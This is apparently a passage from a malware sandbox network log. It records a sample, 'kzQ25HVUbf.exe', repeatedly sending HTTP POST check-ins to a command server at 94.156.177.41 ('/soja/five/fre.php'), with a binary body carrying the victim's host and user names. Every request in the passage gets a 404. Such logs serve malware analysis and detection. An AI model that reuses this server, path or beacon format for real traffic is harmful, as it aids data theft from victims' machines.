                              Jan 11, 2025 08:38:28.837378979 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:29.679384947 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:29 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              79192.168.2.95005994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:29.835344076 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:29.840821981 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:30.528879881 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:30 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              80192.168.2.95006094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:30.688133001 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:30.693073034 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:31.418010950 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:31 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              81192.168.2.95006194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:31.572173119 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:31.577126026 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:32.294554949 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:32 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              82192.168.2.95006294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:32.455660105 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:32.460500956 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:33.203769922 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:33 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              83192.168.2.95006394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:33.641577005 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:33.646502972 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:34.375179052 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:34 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              84192.168.2.95006494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:34.525528908 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:34.530472040 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:35.360055923 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:35 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              85192.168.2.95006594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:35.505433083 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:35.510278940 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:36.209681988 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:36 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              86192.168.2.95006694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:36.465678930 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:36.471295118 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:37.179097891 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:37 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              87192.168.2.95006794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:37.331305981 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:37.336378098 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:38.042653084 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:37 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              88192.168.2.95006894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:38.197530031 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:38.202393055 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:38.911967993 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:38 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              89192.168.2.95006994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:39.233977079 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:39.238877058 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:39.956676960 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:39 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              90192.168.2.95007094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:40.125298977 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:40.130127907 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:40.858809948 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:40 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              91192.168.2.95007194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:41.007462025 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:41.012347937 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:41.746803045 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:41 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              92192.168.2.95007294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:41.963155985 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:41.968094110 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:42.661081076 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:42 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              93192.168.2.95007394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:42.818146944 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:42.823353052 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:43.537935019 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:43 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              94192.168.2.95007494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:43.693097115 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:43.698121071 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:44.418731928 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:44 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              95192.168.2.95007594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:44.590822935 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:44.595801115 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:45.460211992 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:45 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              96192.168.2.95007694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:45.623081923 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:45.627870083 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:46.348886013 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:46 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              97192.168.2.95007794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:46.511816025 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:46.516710997 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:47.254199028 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:47 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              98192.168.2.95007894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:47.419711113 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:47.424670935 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:48.123255968 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:48 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              99192.168.2.95007994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:48.268551111 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
